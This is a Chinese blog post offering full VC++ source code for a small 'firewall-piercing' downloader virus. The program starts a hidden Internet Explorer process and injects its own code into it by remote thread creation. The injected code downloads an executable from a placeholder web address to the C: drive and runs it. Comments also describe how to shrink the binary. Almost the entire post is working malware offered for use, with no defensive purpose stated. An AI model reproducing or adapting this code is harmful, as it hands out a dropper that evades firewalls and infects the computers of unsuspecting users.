一段可以穿过防火墙的病毒程序
发布:admin | 发布时间: 2010年2月7日3k穿墙下载者VC源代码:
/*
"mini_downloader"
code bykardinal p.s.t
compile by vc++ 6.0
can not run under win98;
*/
#include <windows.h>
#pragma comment(lib,"user32.lib")
#pragma comment(lib,"kernel32.lib")
//#pragma comment(linker, "/OPT:NOWIN98") //取消这几行的注释,编译出的文件只有2K大小
//#pragma comment(linker, "/merge:.data=.text")
//#pragma comment(linker, "/merge:.rdata=.text")
//#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/ENTRY:main")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker, "/BASE:0x13150000")
HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR , int );//动态加载shell32.dll中的ShellExecuteA函数
DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//动态加载Urlmon.dll中的UrlDownloadToFileA函数
HANDLE processhandle;
DWORD pid;
HINSTANCE hshell,hurlmon;
void download() //注入使用的下载函数
{
hshell=LoadLibrary("Shell32.dll");
hurlmon=LoadLibrary("urlmon.dll");
(FARPROC&)SHELLRUN=GetProcAddress(hshell,"ShellExecuteA");
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,"URLDownloadToFileA");
DOWNFILE(NULL,"http://www.xxxxxxx.cn/en/notepad.exe","c:\\ieinst12.exe",0, NULL);
SHELLRUN(0,"open","c:\\ieinst12.exe",NULL,NULL,5);
ExitProcess(0);
};
void main() //主函数
{
//1.得到IE路径,并运行
char iename[MAX_PATH],iepath[MAX_PATH];
ZeroMemory(iename,sizeof(iename));
ZeroMemory(iepath,sizeof(iepath));
GetWindowsDirectory(iepath,MAX_PATH);
strncpy(iename,iepath,3);
strcat(iename,"program files\\Internet Explorer\\IEXPLORE.EXE");
//strcat(iename,"windows\\notepad.EXE");
WinExec(iename,SW_HIDE);
Sleep(500);
//2.得到 IE process handle
HWND htemp;
htemp=FindWindow("IEFrame",NULL);
GetWindowThreadProcessId(htemp,&pid);
processhandle=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
//3.分配内存
HMODULE Module;
LPVOID NewModule;
DWORD Size;
LPDWORD lpimagesize;
Module = GetModuleHandle(NULL);//进程映像的基址
//得到内存镜像大小
_asm
{
push eax;
push ebx;
mov ebx,Module;
mov eax,[ebx+0x3c];
lea eax,[ebx+eax+0x50];
mov eax,[eax]
mov lpimagesize,eax;
pop ebx;
pop eax;
};
Size=(DWORD)lpimagesize;
NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//确定起始基址和内存映像基址的位置
//4.写内存,创建线程
WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);//写数据
LPTHREAD_START_ROUTINE entrypoint;
__asm
{
push eax;
lea eax,download;
mov entrypoint,eax;
pop eax
}
CreateRemoteThread(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行
//5.关闭对象
CloseHandle(processhandle);
return;
} ;
文章如转载,请注明转载自:http://www.5iadmin.com/post/254.html
- 相关文章:
绕过防火墙的方法 (2010-1-27 8:1:3)
让无盘也一样具有驱动防火墙 Ver 3.1 (2010-1-26 9:6:7)
防火墙的管理与维护 (2010-1-19 16:18:24)
“间谍”软件克星Ad-Aware (2010-1-16 21:23:17)
发表评论
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。